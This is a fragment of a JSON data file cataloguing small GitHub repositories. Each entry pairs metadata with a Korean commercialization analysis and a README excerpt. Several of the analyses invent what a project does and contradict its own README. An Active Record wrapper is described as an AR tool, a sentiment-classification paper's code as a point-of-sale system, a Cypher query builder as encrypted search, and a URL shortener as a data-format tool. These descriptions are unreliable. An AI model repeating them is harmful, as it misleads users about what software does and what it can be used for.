recipes from other users. This application has a great UI.\n<br><br>\n**Home Screen** \n<br><br>\n![HomeScreen1](https://user-images.githubusercontent.com/59509542/146676257-93ea9f7f-dbe3-464a-907d-6e5e93a81ccb.JPG) ![Search](https://user-images.githubusercontent.com/59509542/146676253-80e85c2c-ce55-4011-9422-097fd75b157d.JPG)\n\n<br><br>\n**Recipe Viewer**\n<br><br>\n![Recipe1](https://user-images.githubusercontent.com/59509542/146676258-999c82e2-5a13-420b-9e64-2e83afa30f83.JPG) ![Recipe2](https://user-images.githubusercontent.com/59509542/146676261-73b2a9d2-b11a-4ad1-be93-ccfecfae6386.JPG)\n\n\n","composite_score":0.5002,"license_safety_tag":"unknown"},{"name":"yetrun/ar-front","github_url":"https://github.com/yetrun/ar-front","stars":5,"language":"JavaScript","license":"Apache-2.0","abandonment_months":55,"description":"# yetrun/ar-front 분석 보고서\n\n## 왜 보물인가\n현실 세계에 디지털 정보를 겹쳐 보여주는 증강현실(AR) 기술을 웹에서 쉽게 구현할 수 있게 해주는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **가구/인테리어 SaaS**: \"구매 전에 내 방에 어떻게 보일지 미리 확인해보세요\" - 온라인 가구점이 증강현실로 상품을 고객 집에 가상 배치\n","readme_excerpt":"# ar-front\n\n> 一个简单的数据模型包装器，可定义属性和方法，使用 Active Record 风格。\n\n`ar-front` 是一个为前端项目准备的数据模型包装器，当然不经过改造亦可用于后端。一个数据模型即是一个类，数据和行为共同封装在一个类里（曰 Active Record 模式）。例如，包装一个 `User` 模型后，会得到如下的调用体验：\n\n```javascript\n// 列表页：获取所有用户，返回一个 User 类的实例数组\nconst users = await User.list()\n\n// 展示页：获取一个用户详情\nconst user = await User.find(1)\nconsole.log(user.name)\nconsole.log(user.age)\n\n// 新建页：创建一个 User 实例，设置属性，然后保存\nconst user = new User()\nuser.name = 'Jim'\nuser.age = 18\nawait user.save()\n\n// 更新页：设置属性，然后保存\nconst user = await User.find(1)\nuser.name = 'Jim'\nuser.age = 18\nawait user.save()\n```\n\n其他更详细的用法参见文档。\n\n## 目录\n\n* [开发理念](#开发理念)\n* [安装](#安装)\n* [快速上手](#快速上手)\n* [使用指南](#使用指南)\n   * [访问和设置属性](#访问和设置属性)\n   * [Model.extend](#modelextend)\n      * [类名称](#类名称)\n      * [属性](#属性)\n      * [计算属性](#计算属性)\n      * [实例方法](#实例方法)\n      * [静态方法](#静态方法)\n      * [配置](#配置)\n      * [混入](#混入)\n   * [Model.config](#modelconfig)\n   * [attributes](#attributes)\n   * [$model](#model)\n   * [新的方式：使用继承来定义模型类](#新的方式使用继承来定义模型类)\n      * [定义模型](#定义模型)\n      * ","composite_score":0.5002,"license_safety_tag":"safe"},{"name":"fgarci03/pylectronics","github_url":"https://github.com/fgarci03/pylectronics","stars":8,"language":"Python","license":"MIT","abandonment_months":27,"description":"# pylectronics 저장소 분석\n\n## 왜 보물인가\n전자기기를 프로그래밍으로 제어하는 것을 누구나 쉽게 배울 수 있도록 만든 교육용 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 교육 플랫폼**: 초중고생과 대학생을 위한 온라인 전자공학 강좌 콘텐츠로 판매\n2. **내부 업무 도구**: 과학관, 메이커스페이스, 코딩 학원의 수업 진행 시스","readme_excerpt":"[![Forks][forks-shield]][forks-url]\n[![Stargazers][stars-shield]][stars-url]\n[![Issues][issues-shield]][issues-url]\n[![MIT License][license-shield]][license-url]\n\n\n\n<br />\n<p align=\"center\">\n  <h3 align=\"center\">Pylectronics</h3>\n\n  <p align=\"center\">\n    Reproduce digital electronics in Python\n    <br />\n    <br />\n    <a href=\"https://github.com/fgarci03/pylectronics/issues\">Report Bug</a>\n    ·\n    <a href=\"https://github.com/fgarci03/pylectronics/issues\">Request Feature</a>\n  </p>\n</p>\n\n\n\n<!-- TABLE OF CONTENTS -->\n<details open=\"open\">\n  <summary><h2 style=\"display: inline-block\">Table of Contents</h2></summary>\n  <ol>\n    <li>\n      <a href=\"#about-the-project\">About The Project</a>\n    </li>\n    <li>\n      <a href=\"#getting-started\">Getting Started</a>\n      <ul>\n        <li><a href=\"#prerequisites\">Prerequisites</a></li>\n        <li><a href=\"#installation\">Installation</a></li>\n      </ul>\n    </li>\n    <li><a href=\"#usage\">Usage</a></li>\n    <li><a href=\"#coding-guidelines\">Co","composite_score":0.5002,"license_safety_tag":"safe"},{"name":"Pastep/PastepFront","github_url":"https://github.com/Pastep/PastepFront","stars":10,"language":"JavaScript","license":"GPL-3.0","abandonment_months":52,"description":"# Pastep/PastepFront 분석\n\n## 왜 보물인가\n웹에서 쉽게 텍스트나 파일을 임시로 공유할 수 있는 \"일회용 메모장\" 같은 서비스로, 개인정보 보호가 중요한 시대에 안전한 정보 공유 수단을 제공합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 보안이 필요한 임시 메시지 공유 플랫폼으로 운영 (일일 활성 사용자 50명 이상 규모)","readme_excerpt":"# Getting Started with Create React App\n\nThis project was bootstrapped with [Create React App](https://github.com/facebook/create-react-app).\n\n## Available Scripts\n\nIn the project directory, you can run:\n\n### `npm start`\n\nRuns the app in the development mode.\\\nOpen [http://localhost:3000](http://localhost:3000) to view it in the browser.\n\nThe page will reload if you make edits.\\\nYou will also see any lint errors in the console.\n\n### `npm test`\n\nLaunches the test runner in the interactive watch mode.\\\nSee the section about [running tests](https://facebook.github.io/create-react-app/docs/running-tests) for more information.\n\n### `npm run build`\n\nBuilds the app for production to the `build` folder.\\\nIt correctly bundles React in production mode and optimizes the build for the best performance.\n\nThe build is minified and the filenames include the hashes.\\\nYour app is ready to be deployed!\n\nSee the section about [deployment](https://facebook.github.io/create-react-app/docs/deployment) for m","composite_score":0.5002,"license_safety_tag":"restricted"},{"name":"Kreijstal/open-event-frontend","github_url":"https://github.com/Kreijstal/open-event-frontend","stars":11,"language":"JavaScript","license":"Apache-2.0","abandonment_months":94,"description":"# Kreijstal/open-event-frontend 분석\n\n## 왜 보물인가\n행사나 컨퍼런스를 온라인으로 쉽게 관리하고 운영할 수 있는 웹 기반 플랫폼으로, 여러 사람이 함께 행사 정보를 관리하고 참가자들과 소통할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 행사 관리 SaaS 서비스**\n- 소규모 워크숍부터 대규모 컨퍼런스까지 모든 크기의 행","readme_excerpt":"# Open Event Frontend\n![Open Event Frontend](https://storage.googleapis.com/eventyay.com/assets/branding/frontend_branding.png)\n\n[![Build Status](https://travis-ci.org/fossasia/open-event-frontend.svg?branch=development)](https://travis-ci.org/fossasia/open-event-frontend)\n[![Gitter](https://img.shields.io/badge/chat-on%20gitter-ff006f.svg?style=flat-square)](https://gitter.im/fossasia/open-event-frontend)\n[![Codacy Badge](https://api.codacy.com/project/badge/Grade/0d51cf60fc734d3699fd6eff6054e483)](https://www.codacy.com/app/fossasia/open-event-frontend?utm_source=github.com&amp;utm_medium=referral&amp;utm_content=fossasia/open-event-frontend&amp;utm_campaign=Badge_Grade)\n[![codecov](https://codecov.io/gh/fossasia/open-event-frontend/branch/development/graph/badge.svg)](https://codecov.io/gh/fossasia/open-event-frontend)\n[![Greenkeeper badge](https://badges.greenkeeper.io/fossasia/open-event-frontend.svg)](https://greenkeeper.io/)\n[![Known Vulnerabilities](https://snyk.io/test/github/","composite_score":0.5002,"license_safety_tag":"safe"},{"name":"suzune25254649/bakusoku_aviutl_plugin","github_url":"https://github.com/suzune25254649/bakusoku_aviutl_plugin","stars":5,"language":"","license":"unknown","abandonment_months":55,"description":"# bakusoku_aviutl_plugin 분석\n\n## 왜 보물인가\n동영상 편집 소프트웨어에 빠른 처리 기능을 추가하는 확장 프로그램으로, 전문 영상 편집자들의 작업 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 웹 기반 영상 편집 플랫폼에 고속 렌더링 옵션을 추가하여 구독료 책정\n2. **내부 업무 도구**:","readme_excerpt":"# ダウンロードの仕方\r\nこのWebページの右側にReleasesという項目があるので、そこから行ける先で最新のZipをダウンロードしてください。\r\n\r\n# 対応aviutlバージョン\r\naviutl1.10 + 拡張編集0.92 でのみデバッグしております。  \r\n他の環境での動作は保証しません。  \r\nが、どうやら aviutl1.10 + 拡張編集0.93rc1 でも動くようです。\r\n\r\n# 規約\r\nこのツール、またはこのツールに含まれるファイルを使用して作った動画を公開する場合\r\n* ニコニコ動画で公開するなら  \r\nコンテンツツリーの親作品に、下記動画を登録してください。  \r\n* 他のサイトで公開するなら  \r\n動画説明欄などに、下記動画へのリンクを掲載してください。\r\n\r\n動画URL：https://www.nicovideo.jp/watch/sm39679253\r\n\r\n手間なのは承知しておりますが、このツールを多くの動画製作者に周知し、楽をしていただくためとなります。よろしくお願いいたします。\r\n\r\n# このツールが解決する「重いこと」\r\n* タイムラインにオブジェクトを大量に配置すると、劇的に重くなること\r\n* ポーリングレートの高いマウス（ゲーミングマウスなど）だと、ダイアログを移動させるのが劇的に重くなること\r\n* 編集対象のオブジェクトを切り替える際、重いこと\r\n\r\n# どう解消するのか\r\nbakusoku.aufを、aviutl.exeと同じフォルダに入れる。  \r\nまたは、他のプラグインと同じフォルダ（aviutl/pluginsフォルダ）に入れる。  \r\n特に設定などはありません。\r\n\r\n# 参考動画\r\nツール解説動画  \r\nhttps://www.nicovideo.jp/watch/sm39679253\r\n\r\n# バグ報告\r\nhttps://twitter.com/suzune25254649\r\n\r\nこちらまで、DMやリプで報告をくださると凄く喜びます。（バグはなるべく直したい）\r\n\r\n爆速プラグインは、動作が軽快になる以外の影響は極力出さないようにする方針です。  \r\nそのため、導入前には起きず、導入後には起きる不都合は全て、バグと考え報告していただけると助かります。\r\n\r\n# 断り書き\r\nこのツールは規約を守る範囲で自由にお使","composite_score":0.5002,"license_safety_tag":"unknown"},{"name":"BartoszMilewski/AoC2021","github_url":"https://github.com/BartoszMilewski/AoC2021","stars":9,"language":"Haskell","license":"GPL-3.0","abandonment_months":54,"description":"# BartoszMilewski/AoC2021 분석\n\n## 왜 보물인가\n프로그래밍 문제 풀이 과정을 통해 논리적 사고력과 문제 해결 능력을 키울 수 있는 학습 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 코딩 교육 플랫폼**: 초급자를 위한 프로그래밍 강좌 커리큘럼에 문제 풀이 사례로 활용\n2. **기업 신입 사원 교육 프로그램**: IT 회사의","readme_excerpt":"# Advent of Code 2021\n","composite_score":0.5002,"license_safety_tag":"restricted"},{"name":"FengYuGG520/FYAPPS","github_url":"https://github.com/FengYuGG520/FYAPPS","stars":9,"language":"Objective-C","license":"MIT","abandonment_months":83,"description":"# FYAPPS 저장소 분석\n\n## 왜 보물인가\n작은 규모이지만 실제 사용자가 관심을 가질 만큼 완성도 있는 앱 모음으로, MIT 라이선스를 통해 자유롭게 개선하고 상용화할 수 있는 기반을 갖추고 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 현재 코드를 클라우드 기반 웹 서비스로 전환하여 구독 상품화\n2. **내부 업무 도구**: 중","readme_excerpt":"# FYAPPS\nSwift\n","composite_score":0.5002,"license_safety_tag":"safe"},{"name":"zwilias/elm-thanks","github_url":"https://github.com/zwilias/elm-thanks","stars":8,"language":"JavaScript","license":"BSD-3-Clause","abandonment_months":53,"description":"# zwilias/elm-thanks 상용화 분석\n\n## 왜 보물인가\n프로그래밍 언어 생태계에서 라이브러리 개발자들의 기여도를 자동으로 추적하고 감사를 표현할 수 있는 희귀한 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **오픈소스 커뮤니티 플랫폼**: GitHub 프로젝트 페이지에 자동으로 기여자 감사 메시지를 생성하고 관리하는 웹 서비스\n2. **기업 ","readme_excerpt":"# elm-thanks\n🌟 Say thanks to everyone who helps build and maintain your Elm dependencies\n\n![Example gif](https://github.com/zwilias/elm-thanks/raw/master/example.gif)\n\nVaguely inspired by [this The Changelog tweet](https://twitter.com/changelog/status/935549633341853698) (ok, maybe more than just _vaguely inspired_), I figured this type of thing would be nice to have in the Elm world, too.\n\nThe idea is to express our gratitude to the creators and maintainers of our dependencies by starring the github repositories. If you're anything like me, actually going to the GitHub repo is asking too much so \"here's an app for that\".\n\n## Install it\n\n```sh\n$ npm i -g elm-thanks\n```\n\n## Configure authentication\n\n[Create a github token](https://github.com/settings/tokens/new) with `public_repo` permissions and export it as an environment variable: `export GITHUB_TOKEN=yourtokengoeshere`\n\n## Run it\n\nFrom any folder containing either an `elm-package.json` or an `elm.json` file, run:\n\n```sh\n$ elm-thanks","composite_score":0.5002,"license_safety_tag":"safe"},{"name":"lifei114/lightbatis","github_url":"https://github.com/lifei114/lightbatis","stars":5,"language":"Java","license":"Apache-2.0","abandonment_months":36,"description":"# Lightbatis 저장소 분석\n\n## 왜 보물인가\n데이터베이스와 연결되는 웹 애플리케이션을 만들 때 반복적인 작업을 자동으로 처리해주는 도구로, 개발 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 고객 관리, 판매 현황 추적 등 데이터 기반의 웹 서비스를 빠르게 구축하여 출시 속도 향상\n- **내부 업무 도구","readme_excerpt":"```\n█████████████████████████████████████  \n█████████████████████████████████████  \n████ ▄▄▄▄▄ █▀█ █▄▄▀▀ ▀▄█ █ ▄▄▄▄▄ ████  \n████ █   █ █▀▀▀█ ▀▀ ████▄█ █   █ ████  \n████ █▄▄▄█ █▀ █▀▀▄▀▀▄ ▀█ █ █▄▄▄█ ████  \n████▄▄▄▄▄▄▄█▄▀ ▀▄█▄▀▄█ ▀ █▄▄▄▄▄▄▄████  \n████ ▄ ▄ ▀▄  ▄▀▄▀▄ █ █▀ █ ▀ ▀▄█▄▀████  \n████▄ ▄   ▄▄██▄█▀▄  ▄▄▀█ ▄▀  ▀█▀█████  \n████ ▀▄▄█ ▄▄▄ ▄█▄▄▀▄▄█▀ ▀▀▀▀▀▄▄█▀████  \n█████ ▀ ▄ ▄▄█▀  ▄██ █▄▄▀  ▄ ▀▄▄▀█████  \n████▀▄  ▄▀▄▄█▄▀▄▀█▄▀▀ ▄ ▀▀▀ ▀▄ █▀████  \n████ ██▄▄▄▄█▀▄▀█▀█▀▄▀█ ▀▄▄█▀██▄▀█████  \n████▄███▄█▄█▀▄ █▄▀▄▄▀▄██ ▄▄▄ ▀   ████  \n████ ▄▄▄▄▄ █▄█▄ ▄▄  ██▄  █▄█ ▄▄▀█████  \n████ █   █ █ ▀█▄ ▀ ▄▄▀▀█ ▄▄▄▄▀ ▀ ████  \n████ █▄▄▄█ █ ▄▀███▀▄▄▄▄▄ █▄▀  ▄ █████  \n████▄▄▄▄▄▄▄█▄███▄█▄▄▄▄▄██▄█▄▄▄▄██████  \n█████████████████████████████████████  \n█████████████████████████████████████ \n``` \n# Lightbatis 是什么 ?\n\n    lightbatis 是基于约定的命名规范和类型规范在 Mybatis 的基础上开发的，快速的、简洁的数据持久层工具包。\n\n# 为什么会有 Lightbatis ?\n传统的基于 Mybatis 的数据持久层，有以下的规律，先定义实体类，实体类有三分部分组成，XML 定义， Entity Bean 和表结构，如下图：  \n![关系图](./doc/6.jpeg)  \n进行数据访问的操作，也有三部分组成， Mappe","composite_score":0.5002,"license_safety_tag":"safe"},{"name":"BD-MF/POS4ASC","github_url":"https://github.com/BD-MF/POS4ASC","stars":6,"language":"Python","license":"unknown","abandonment_months":58,"description":"# BD-MF/POS4ASC 분석 보고서\n\n## 왜 보물인가\n소매점이나 음식점에서 필요한 결제 시스템을 직접 만들 수 있는 오픈소스 도구로, 비용 부담 없이 자신의 사업에 맞게 커스터마이징할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 소규모 카페·편의점을 위한 월 구독형 결제 관리 플랫폼\n- **내부 업무 도구**: 프랜차이즈 회","readme_excerpt":"# POS4ASC\n\n**POS4ASC** - Exploiting **Pos**ition Bias for Robust **A**spect **S**entiment **C**lassification\n* Our code and data for [ACL 2021](https://2021.aclweb.org/) paper titled \"[Exploiting Position Bias for Robust Aspect Sentiment Classification](https://arxiv.org/abs/2105.14210)\" \n* [Fang Ma](https://github.com/BD-MF), [Chen Zhang](https://genezc.github.io), and [Dawei Song](http://cs.bit.edu.cn/szdw/jsml/js/sdw/index.htm).\n\n## Intuition\n\n### Robustness Issue\n\n* State-of-the-art ASC models are recently shown to suffer from the issue of robustness. Particularly in two common scenarios: 1) out-of-domain (O.O.D.) scenario, and 2) adversarial (Adv.) scenario. A case is given below:\n\n    <img src=\"./assets/case.png\" width=\"520\" alt=\"case\" align=center/>\n\n### Position Bias Helps\n\n* We hypothesize that **position bias** (i.e., the words closer to a concerning aspect would carry a higher degree of importance) is crucial for building more robust ASC models by reducing the probability of","composite_score":0.5002,"license_safety_tag":"unknown"},{"name":"akkartik/teliva","github_url":"https://github.com/akkartik/teliva","stars":5,"language":"C","license":"NOASSERTION","abandonment_months":30,"description":"# Teliva 저장소 분석\n\n## 왜 보물인가\n프로그래밍 초보자도 쉽게 배우고 사용할 수 있는 간단한 프로그래밍 환경을 제공합니다.\n\n## 어디에 쓸 수 있나\n\n1. **교육용 SaaS**: 학생들이 웹에서 직접 코딩을 배울 수 있는 온라인 강의 플랫폼\n2. **기업 내부 도구**: 비개발자 직원들도 간단한 자동화 작업을 직접 만들 수 있는 저코드 도구\n","readme_excerpt":"# Teliva - an environment for end-user programming\n\n> &ldquo;Enable all people to modify the software they use in the course of using it.&rdquo;\n> &mdash; https://futureofcoding.org/episodes/033.html\n\n> &ldquo;What if we, and all computer users, could reach in and modify our favorite apps?&rdquo;\n> &mdash; https://www.inkandswitch.com/end-user-programming\n\n> &ldquo;Software must be as easy to change as it is to use.&rdquo;\n> &mdash; https://malleable.systems\n\n## What's this, then?\n\nTeliva is the most naive way to make software as easy to change as it is to\nuse: an interpreted environment for running shareable little text-mode apps.\nIts language of choice is Lua, excluding all features that can conceivably\nintroduce moving parts in running a Lua program.\n\nHere's how you run one of the example apps (the [Tower of Hanoi](https://en.wikipedia.org/wiki/Tower_of_Hanoi)):\n\n```sh\ngit clone https://github.com/akkartik/teliva\ncd teliva\nmake linux  # replace with 'macosx', etc. depending on your ","composite_score":0.5002,"license_safety_tag":"unknown"},{"name":"jdksloan/CypherEngine","github_url":"https://github.com/jdksloan/CypherEngine","stars":6,"language":"TypeScript","license":"MIT","abandonment_months":57,"description":"# CypherEngine 상용화 분석\n\n## 왜 보물인가\n암호화된 데이터베이스 쿼리를 직접 처리할 수 있어, 민감한 정보를 보호하면서도 빠르게 검색하는 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **의료 SaaS**: 환자 정보를 암호화된 상태로 보관하면서도 의사가 필요한 진료 기록을 즉시 검색할 수 있는 서비스\n2. **은행권 내부 도구**: 고객의 ","readme_excerpt":"# CypherEngine\n\n## Introduction\n**Cypher Engine** is a fully tested *Cypher* query engine which generates queries in a functional, easy to read, and simple way. It is designed for NodeJS and written in TypeScript.\n\n## Premise\nThis documentation **does not** explain how *Cypher* works nor does it try to be a tutorial for *Cypher*. When using this library it is recommended that you have a good understanding of the *Cypher* language. Please see the [Cyper Documentation](https://neo4j.com/docs/cypher-manual/current/) for more information.\n\n## Usage\n```\nnpm i cypher-engine\n```\n## Index\n* [Create](#create)\n* [Delete](#delete)\n* [Match](#match)\n* [Set](#set)\n* [Merge](#merge)\n* [Extra](#extra)\n\n\n### Create\n\nCreating a node in Cypher is the fundamental way to build data in the graph.\n\n```\nconst engine = new CypherEngine();\n\nconst create = engine\n    .create()\n    .node(['Person'], 'jeff', new Property('name', `'Jeff'`))\n    .toString();\n\n// CREATE (jeff:Person {name: 'Jeff'})\n```\n\n\n\n### Match\n","composite_score":0.5002,"license_safety_tag":"safe"},{"name":"zebp/std-land","github_url":"https://github.com/zebp/std-land","stars":9,"language":"TypeScript","license":"unknown","abandonment_months":52,"description":"# zebp/std-land 프로젝트 분석\n\n## 왜 보물인가\n표준화된 데이터 형식을 정의하고 관리하는 기초 도구로, 여러 시스템이 서로 다른 언어로 대화할 수 있게 돕는 '번역기' 역할을 합니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 데이터 호환성 검증 플랫폼**\n여러 회사의 소프트웨어가 정보를 주고받을 때 올바른 형식으로 변환되는지 자","readme_excerpt":"# std.land\n\nA url shortener for the Deno standard library similar to Rust's https://std.rs/\n","composite_score":0.5002,"license_safety_tag":"unknown"},{"name":"chris-pearce/backpack.css","github_url":"https://github.com/chris-pearce/backpack.css","stars":8,"language":"HTML","license":"MIT","abandonment_months":40,"description":"# Backpack.css 프로젝트 분석\n\n## 왜 보물인가\n웹사이트의 디자인을 간편하게 만들어주는 미니멀한 도구 모음으로, 작은 프로젝트부터 빠르게 시작할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 스타트업이 빠르게 웹 서비스의 기본 디자인을 구성하고 출시하는 데 활용\n- **내부 업무 도구**: 회사의 관리 시스템이나 대시보드","readme_excerpt":"[![NPM\nversion](https://img.shields.io/npm/v/backpack.css.svg?longCache=true&style=popout-square)](https://www.npmjs.com/package/backpack.css) [![GitHub\nlicense](https://img.shields.io/github/license/chris-pearce/backpack.css.svg?longCache=true&style=popout-square)](https://github.com/chris-pearce/backpack.css/blob/master/LICENSE) [![Dependencies](https://img.shields.io/david/chris-pearce/backpack.css.svg?longCache=true&style=popout-square)](https://david-dm.org/chris-pearce/backpack.css) [![Dev\ndependencies](https://img.shields.io/david/dev/chris-pearce/backpack.css.svg?longCache=true&style=popout-square)](https://david-dm.org/chris-pearce/backpack.css?type=dev) [![Contributor Covenant](https://img.shields.io/badge/Contributor%20Covenant-v2.0%20adopted-ff69b4.svg)](https://github.com/chris-pearce/backpack.css/blob/master/CODE_OF_CONDUCT.md) [![PRs\nWelcome](https://img.shields.io/badge/PRs-welcome-brightgreen.svg?style=flat-square)](http://makeapullrequest.com) [![Downloads](https://im","composite_score":0.5002,"license_safety_tag":"safe"},{"name":"Harrisonust/STM32Keyboard","github_url":"https://github.com/Harrisonust/STM32Keyboard","stars":6,"language":"C","license":"unknown","abandonment_months":36,"description":"# STM32Keyboard 프로젝트 분석\n\n## 왜 보물인가\nSTM32 마이크로컨트롤러를 활용한 커스텀 키보드 펌웨어로, 하드웨어 애호가들이 자신만의 독특한 입력 장치를 만들 수 있게 해주는 오픈소스입니다.\n\n## 어디에 쓸 수 있나\n\n1. **게이밍/프로그래밍 커뮤니티 교육 플랫폼**: 사용자가 STM32 기반 맞춤형 키보드를 직접 제작하고 공유하는 온","readme_excerpt":"# STM32 Keyboard\n<img src=\"https://img.shields.io/badge/Made_with-stm32f103-blueviolet\"><img src=\"https://img.shields.io/badge/Status-ongoing-brightgreen\">[![YOUTUBE](https://img.shields.io/badge/Video-Youtube-red)](https://youtu.be/Xp9VSN2TY44)\n![View](doc/images/view.jpg)\nOriginated from HKUST Elec3300 project\n\n## Feature List\n* 6*14 key matrix\n* Programmable 6*14 RGB matrix\n* On-board OLED display(SSD1306)\n* Volume control by Rotary encoder\n* Fingerprint sensor\n* Programmable Macro\n* Sleep Mode(low power mode)\n* Connection:\n    * Bluetooth\n    * USB\n* Power:\n    * USB power supply\n    * Battery(with USB charging)\n\n## Feature Specification\n\n### RTOS\nWe use RTOS to manage all the tasks\n\n1. RGB Thread: \n    1. Change pwm pulse width to control color\n2. Key Thread: \n    1. Detect key pressed and send HID report to computer\n    2. Read volume encoder\n3. Others Thread: \n    1. System Debug LED Blink\n    2. Read Battery ADC\n4. Key Interrupt\n\t1. Generate an interrupt whenever a key is press","composite_score":0.5002,"license_safety_tag":"unknown"},{"name":"kawmra/typist-json","github_url":"https://github.com/kawmra/typist-json","stars":9,"language":"TypeScript","license":"MIT","abandonment_months":41,"description":"# typist-json 사업화 분석\n\n## 왜 보물인가\n복잡한 데이터를 간단한 형식으로 자동 변환해주는 도구로, 개발자들의 반복적인 수작업을 획기적으로 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 데이터 형식 자동 변환 플랫폼으로 운영하여 중소 IT회사들에게 월 구독 서비스 제공\n2. **내부 업무 도구**: 금융사나 대형","readme_excerpt":"<p align=\"center\">\n  <img src=\"assets/logo.svg\" width=\"200\">\n</p>\n\n<h1 align=\"center\">Typist JSON</h1>\n\n<p align=\"center\">\n  <a href=\"https://bundlephobia.com/result?p=typist-json\">\n    <img src=\"https://badgen.net/bundlephobia/minzip/typist-json\" alt=\"minzipped size\">\n  </a>\n  <img src=\"https://badgen.net/npm/types/typist-json?icon=typescript\" alt=\"types\">\n  <a href=\"LICENSE\">\n    <img src=\"https://badgen.net/npm/license/typist-json\" alt=\"license\">\n  </a>\n  <a href=\"https://github.com/kawmra/typist-json/actions/workflows/ci.yml\">\n    <img src=\"https://github.com/kawmra/typist-json/actions/workflows/ci.yml/badge.svg\" alt=\"ci\">\n  </a>\n</p>\n\n<p align=\"center\">\n  A simple runtime JSON type checker.\n</p>\n\n# Features\n\n- **Simple**. No JSON Schema, No validation rules\n- **Type-safe**. Written in TypeScript\n- **Intuitive**. Familiar syntax like TypeScript interface\n\nTypist JSON is focused on type checking, so there is no validation rules like range of numbers or length of strings.\n\n# Install\n","composite_score":0.5002,"license_safety_tag":"safe"},{"name":"boostcamp-moa/CS-study","github_url":"https://github.com/boostcamp-moa/CS-study","stars":6,"language":"","license":"unknown","abandonment_months":65,"description":"# CS-study 저장소 분석\n\n## 왜 보물인가\n개발자 면접을 준비하는 사람들이 필요한 기초 전산학 지식을 한곳에 정리해놓은 학습 자료집입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 신입 개발자 교육 프로그램에 커리큘럼 기반으로 제공\n2. **기업 인사 도구**: 개발자 채용 시 면접 평가 기준 및 예상 질문 데이터베이스로 활용\n","readme_excerpt":"# CS-study Rule\n\n- 각자 15분 내외 설명하는 분량으로 주제를 선정\n\n### 시간표 (월~금)\n\n**1. 오전 10시 30분 - 11시 50분 : CS 발표**<br>\n2. ~ 오후 1시 : 점심시간<br>\n3. ~ 오후 6시 : PS 공부 & CS 복습<br>\n4. ~ 오후 7시 : 저녁 시간<br>\n5. ~ 코어타임 끝 : CS 공부<br>\n\n### 파트 배분\n\n|날짜|네트워크|운영체제|데이터베이스/FE 면접 질문|웹|\n|-|-|-|-|-|\n|12/23(수)|현우|민수|병화|영근|\n|12/24(목)|영근|현우|민수|병화|\n|12/28(월)|병화|영근|현우|민수|\n|12/29(화)|민수|병화|영근|현우|\n|12/30(수)|현우|민수|병화|영근|\n|12/31(목)|영근|현우|민수|병화|\n|1/4(월)  |병화|영근|현우|민수|\n|1/5(화)  |민수|병화|영근|현우|\n|1/6(수)  |라|인|코|테|\n|1/7(목)  |휴|식|타|임|\n|1/8(금)  |네|이|버|코테|\n\n### 공부 파트\n> 우선 면접 대비용으로 최대한 핵심적인 내용만 가져가자.\n\n- 네트워크\n    1. OSI 7계층\n    2. TCP 3 way handshake & 4 way handshake\n    3. TCP/IP (흐름제어/혼잡제어)\n    4. UDP\n    5. 대칭키 & 공개키\n    6. HTTP, HTTP의 문제점들 & HTTPS\n    7. 로드밸런싱(Load Balancing)\n    8. Blocking & Non-Blocking I/O\n    9. ipv4, ipv6\n    10. 서브넷 마스크\n    11. 브로드 캐스팅/유니 캐스팅/멀티 캐스팅/애니 캐스팅\n    \n    (SaaS/PaaS/IaaS/DaaS)\n    (도커/쿠버네티스)\n\n- OS\n    1. 운영체제란?\n    2. 프로세스와 스레드\n    3. 프로세스 주소공간\n    4. 인터럽트\n    5. 시스템콜\n    6. PCB와 Context Switching\n    7. IPC\n ","composite_score":0.5002,"license_safety_tag":"unknown"},{"name":"fogleman/AdventOfCode2021","github_url":"https://github.com/fogleman/AdventOfCode2021","stars":7,"language":"Python","license":"unknown","abandonment_months":54,"description":"# AdventOfCode2021 저장소 분석\n\n## 왜 보물인가\n매년 전 세계 수십만 명이 참여하는 '어드벤트 오브 코드' 챌린지의 완성된 솔루션 모음으로, 문제 해결 방식을 학습하는 교육 자료로 매우 가치 있습니다.\n\n## 어디에 쓸 수 있나\n- **프로그래밍 학습 플랫폼**: 초보자용 온라인 강의에 \"어려운 문제 풀이 예제\" 섹션으로 통합\n- **기업","readme_excerpt":"","composite_score":0.5002,"license_safety_tag":"unknown"},{"name":"with-heart/chakra-formik-experiment","github_url":"https://github.com/with-heart/chakra-formik-experiment","stars":7,"language":"TypeScript","license":"MIT","abandonment_months":61,"description":"# chakra-formik-experiment 분석\n\n## 왜 보물인가\n웹사이트에서 사용자가 입력한 정보를 정확하게 검증하고 관리하는 기술을 쉽게 구현할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 회원가입, 설정 페이지 등 사용자 입력이 많은 웹 애플리케이션의 폼(입력창) 관리\n2. **내부 업무 도구**: 직원들이 사","readme_excerpt":"# Chakra+Formik Integration Experiment\n\n## What is this?\n\nThis project is a prototype for a Chakra UI+Formik integration library.\n\nThe goals of this project:\n\n- provide an API that is familiar to both Chakra UI and Formik users\n- experiment with and establish patterns that can eventually be turned into an\n  official Chakra UI extension library\n\n**As this is a pre-`1.0` experiment, the API is subject to change.**\n\n## Demo\n\nCheck out this CodeSandbox for a demonstration of the components in action:\nhttps://codesandbox.io/s/interesting-blackburn-oldox?file=/src/App.tsx\n\n## Installation\n\nInstall [Chakra UI](https://chakra-ui.com/docs/getting-started) and\n[Formik](https://formik.org/docs/overview#npm), then:\n\n```sh\n# with yarn\nyarn add chakra-formik-experiment\n\n# with npm\nnpm install chakra-formik-experiment\n```\n\n## Usage\n\n`chakra-formik-experiment` works by connecting Chakra form components to a\nFormik form's context using the `name` prop.\n\nThe `name` prop can be passed directly to the 